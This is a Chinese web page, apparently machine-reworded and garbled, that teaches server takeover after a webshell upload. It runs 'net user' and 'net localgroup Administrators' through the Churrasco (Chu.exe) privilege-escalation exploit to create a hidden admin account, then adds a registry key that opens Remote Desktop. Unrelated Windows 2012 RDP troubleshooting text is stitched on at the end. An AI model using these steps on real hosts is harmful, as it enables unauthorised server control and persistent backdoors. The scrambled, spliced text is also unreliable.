简明的讲一下。

有很多小白误认为上行了一句话木马用菜刀链接就等于拿到shell了,其实不然。

0x00权限治理引见

系统为了都有有权限治理系统，依据权限高下来选择用户在这台机器上能做的事。

比如有的文件规则了低权限用户是不可读写的，而这些文件理论是咱们想要失掉的敏感文件。

有的文件夹是规则不能读写的，那么咱们就不能上行任何到这个文件夹，也不可从这个文件夹里运转任何程序，所以咱们衔接上主机都要找一个可读可写的文件夹来继续上行咱们须要的程序，如开后门的程序。

普通的网站都存储在主机权限比拟低的文件夹里，所以即使咱们上行了WebShell，最多也只能够对网站所在的文件夹操作，而不能完整的控制整个主机。所以咱们以一个权限相当高的用户来访问该主机。

Windows中以用户组来调配权限，每个用户组有不同的权限，其中最高权限用户组是Administrators组，领有对整个系统启动操作system权限。每个用户组下可以创立多个用户。

在Win10以前的Windows系统版本中，可以经过右键此电脑=》治理=》系统工具=》本地用户和组来检查用户组及用户组中的用户。

0x01大马和菜刀

我试过各种大马，配置其实都迥然不同，不过不知道是不是我经常使用的要素，外面的cmd并不怎样好用。大马里我团体感觉最有用的就是检查文件权限属性的配置，这个使咱们在找后门上行点的时刻是十分好用的，并且这个配置在菜刀里是没有的。

这种php大马可以在Perms项下看到文件的读写权限属性。

0x02巴西烤肉提权

创立系统用户的命令如下：

netuser[username][password]/add

netlocalgroupAdministrators[username]/add

netuser[username]/active:yes

因为普通网站被放在主机中权限比拟低的文件夹中，因此间接创立Administrator用户的命令是不被口头的。

巴西烤肉是一个十分微弱的程序，它可以忽视拒绝强迫口头cmd命令，经常被用到提权中。

咱们经过菜刀将cmd.exe和巴西烤肉上行到网站文件夹中。

SETP../../www/uploads/cmd.exe

Chu.exe"netuser[username][password]/add&netlocalgroupAdministrators[username]/add"

REGADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server/vfDenyTSConnections/tREG_DWORD/d00000000/f

mstsc/admin

win8 R2无法打开3389端口,不能远程桌面怎么办

【问题状况】

远程桌面无法连接提示如下：

2 我的远程桌面是开启的 ：

3.服务状态也是开启的：

4.查看端口状态的时候没有3389端口。后来发现时由于我上午删除了RD 回话主机配置：

解决办法：

右键RD会话主机配置—创建新的连接：

下一步：填写上 连接的名称，下一步直到完成。

然后：在刚刚创建的连接上右键–点击属性 ——远程控制—-勾选使用默认用户配置的控制

最后：将

Remote Desktop Services

Remote Desktop Configuration

这2个服务 手动改为自动启动。重启计算机可以解决问题了

怎么开启Windows2012系统的远程桌面3389连接功能

Windows2012操作系统设置远程连接方法：

至此设置完毕，默认开启的说3389端口，防火墙默认是开启的，如果为了安全，可以自行修改端口，但是修改后的端口要在防火墙中添加例外才可以进行远程。

怎么开启Windows2012系统的远程桌面3389连接功能

呵呵!很简单: 如果2012系统的电脑是被连接的,那么在按下快捷键 WIN+Break后选择高级系统设置---远程---在允许远程协助连接这台计算机 前面打勾---下面选择 允许任意版本远程桌面连接到这台计算机 确定OK;如果2012系统是控制别人的电脑,在确保对方做了上诉操作后,你只要输入地址的后面加上:3389(冒号:3389)就可以了.

本文地址： https://yihaiquanyi.com/article/159f69fd01b85e0efe19.html